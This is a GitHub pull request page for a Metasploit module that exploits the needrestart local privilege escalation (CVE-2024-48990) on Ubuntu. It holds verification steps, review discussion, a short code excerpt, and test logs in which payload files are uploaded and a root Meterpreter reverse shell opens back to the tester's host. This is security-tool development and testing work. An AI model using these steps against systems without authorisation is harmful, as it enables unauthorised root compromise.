Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Ubuntu needrestart LPE (CVE-2024-48990) #19676

Open
wants to merge 8 commits into
base: master
Choose a base branch
from

Conversation

h00die
Copy link
Contributor

@h00die h00die commented Nov 22, 2024

Fixes #19675

Exploits needrestart on Ubuntu. Debian and Fedora put out patches, but after putting minor effort into testing them and a bunch of PoCs on github, I gave up trying to make it work. If someone wants to expand this module, be my guest. Happily working on Ubuntu though!

Verification

  • Install the application
  • Start msfconsole
  • Get an initial shell
  • Do: use exploit/linux/local/ubuntu_needrestart_lpe
  • Do: set lhost <ip>
  • Do: set lport <port>
  • Do: set session <session>
  • Do: run
  • You should get a root shell.

Comment on lines 83 to 85
version = cmd_exec('cat /etc/issue | cut -d " " -f 2').strip
version = version.slice(0, 5) # take off any extra version info
return CheckCode::Safe("Ubuntu version #{version} is not vulnerable") unless fixed_versions.key? version
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Why couldn't those versions of Ubuntu run a vulnerable version of needrestart?

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

you could get it running on every version of ubuntu by installing via source code. I'm not bothering with detecting the self-reported version number from the binary due to backporting. Plus its pre-installed on Ubuntu so someone installing a newer version via source code seems unlikely. I think this is good enough for the time being, but am open to PRs if theres a better way

modules/exploits/linux/local/ubuntu_needrestart_lpe.rb Outdated Show resolved Hide resolved
vprint_status("Uploading payload: #{payload_path}")
register_files_for_cleanup(payload_path)

# our c stub file does our chmod/chown/suid for the payload
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Wouldn't it be better to use metasploit's options/features to prepend the setuid call to the payload, instead of having it in the stub?

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

it may be possible, this was a copy of the PoC with no additions.

However, I'm not sure if it would work since the c_stub is originally called by the python script itself. It fails to do the chmod etc. The python stub then waits watching for our payload to get modified.

needrestart is run by sudo/root/etc, which then runs our c_stub, changes the permissions. It may be possible to modify c_stub so that it executes the payload directly only if it detects itself running as root. That would take out some system complexity, but i may need some @zeroSteiner (or other r7) on updating the code to work in metasm (updated code coming soon).

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

looks like this can be refined some more, further testing will happen this week

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I thought we may be able to launch the payload from the .so file directly, but even w/ threading (prepend_thread, and with &) , it freezes needrestart. Its a delicate tradeoff between the python script and .so file, so I think this is a good strategy for now. We've already improved on the original PoC by cutting out the build file, and using metasm to avoid the need for gcc/build-essential

modules/exploits/linux/local/ubuntu_needrestart_lpe.rb Outdated Show resolved Hide resolved
modules/exploits/linux/local/ubuntu_needrestart_lpe.rb Outdated Show resolved Hide resolved
@h00die h00die changed the title Ubuntu needrestart LPE (CVE-2024-48990) WIP: Ubuntu needrestart LPE (CVE-2024-48990) Nov 25, 2024
@h00die h00die marked this pull request as ready for review November 27, 2024 20:57
Copy link
Contributor

@cdelafuente-r7 cdelafuente-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thank you @h00die ! I just left a couple of comments for you to review when you get a chance.

modules/exploits/linux/local/ubuntu_needrestart_lpe.rb Outdated Show resolved Hide resolved
modules/exploits/linux/local/ubuntu_needrestart_lpe.rb Outdated Show resolved Hide resolved
@h00die h00die changed the title WIP: Ubuntu needrestart LPE (CVE-2024-48990) Ubuntu needrestart LPE (CVE-2024-48990) Nov 28, 2024
@dledda-r7 dledda-r7 self-assigned this Dec 5, 2024
@dledda-r7
Copy link
Contributor

dledda-r7 commented Dec 9, 2024

Hello @h00die, I am trying the module against an Ubuntu 22.04.
This is the package I installed.

ii  needrestart                                3.5-5ubuntu2.4

However the target looks not vulnerable, with set verbose true I didn't get any other information.

@h00die
Copy link
Contributor Author

h00die commented Dec 10, 2024

https://ubuntu.com/security/CVE-2024-48990

Fixed: 3.5-5ubuntu2.2

So definitely not vulnerable. Are you running the check method and not getting output?

@dledda-r7
Copy link
Contributor

dledda-r7 commented Dec 10, 2024

https://ubuntu.com/security/CVE-2024-48990

Fixed: 3.5-5ubuntu2.2

So definitely not vulnerable. Are you running the check method and not getting output?

ouch, last number was different! not sure if I can get that version from apt gonna try now...

EDIT

Ok so, I've installed the vulnerable version of needrestart, however I am having some issue to trigger the vulnerability.

msf6 exploit(linux/local/ubuntu_needrestart_lpe) > exploit

[*] Started reverse TCP handler on 172.30.226.46:4445 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Vulnerable needrestart version 3.5.pre.5ubuntu2 detected on Ubuntu 22.04
[*] Writing '/tmp/.6q2zZX8' (250 bytes) ...
[*] Uploading payload: /tmp/.6q2zZX8
[*] Creating directory /tmp/importlib
[*] /tmp/importlib created
[*] Uploading c_stub: /tmp/importlib/__init__.so
[*] Uploading py_script: /tmp/.UMzFtAjoc
[*] Launching exploit, and waiting for needrestart to run...

From metasploit side I see this, but on the target host when I do: sudo needrestart nothing happen, could be some configuration issue?

@dledda-r7 dledda-r7 removed their assignment Dec 13, 2024
@msutovsky-r7 msutovsky-r7 self-assigned this Dec 13, 2024
@h00die
Copy link
Contributor Author

h00die commented Dec 21, 2024

sorry, missed that there was an update/feedback!

@h00die
Copy link
Contributor Author

h00die commented Dec 21, 2024

From metasploit side I see this, but on the target host when I do: sudo needrestart nothing happen, could be some configuration issue?

When you do sudo needrestart it should pop up a progress bar saying something along the lines of 'scanning processes'. Your shell should execute at the end of that progress bar. Then it'll put a whole bunch of other things on the screen as well.
image

I just tried this exploit again on my 3.5.pre.5ubuntu2.1 detected on Ubuntu 22.04 and no issues.

Downgraded to 3.5-5ubuntu2 to mirror your setup, had no issues:

[msf](Jobs:2 Agents:1) exploit(linux/local/ubuntu_needrestart_lpe) > exploit

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Vulnerable needrestart version 3.5.pre.5ubuntu2 detected on Ubuntu 22.04
[*] Writing '/tmp/.hGNEfOOOIq' (250 bytes) ...
[*] Uploading payload: /tmp/.hGNEfOOOIq
[*] Creating directory /tmp/importlib
[*] /tmp/importlib created
[*] Uploading c_stub: /tmp/importlib/__init__.so
[*] Uploading py_script: /tmp/.ImbZfQ5Cr
[*] Launching exploit, and waiting for needrestart to run...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 2.2.2.2
[+] Deleted /tmp/.hGNEfOOOIq
[+] Deleted /tmp/importlib/__init__.so
[+] Deleted /tmp/.ImbZfQ5Cr
[+] Deleted /tmp/importlib
[*] chown: changing ownership of '/tmp/.hGNEfOOOIq': Operation not permitted
[*] Error processing line 1 of /usr/lib/python3/dist-packages/zope.interface-5.4.0-nspkg.pth:
[*] 
[*]   Traceback (most recent call last):
[*]     File "/usr/lib/python3.10/site.py", line 192, in addpackage
[*]       exec(line)
[*]     File "<string>", line 1, in <module>
[*]   ImportError: dynamic module does not define module export function (PyInit_importlib)
[*] 
[*] Remainder of file ignored
[*] #########################
[*] 
[*] Dont mind the error message above
[*] 
[*] Waiting for needrestart to run...
[*] Meterpreter session 4 opened (1.1.1.1:4444 -> 2.2.2.2:46304) at 2024-12-21 13:04:51 -0500

(Meterpreter 4)(/home/ubuntu) > getuid
Server username: root

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
Status: Waiting on Contributor
Development

Successfully merging this pull request may close these issues.

Ubuntu needrestart LPE (CVE-2024-48990)
5 participants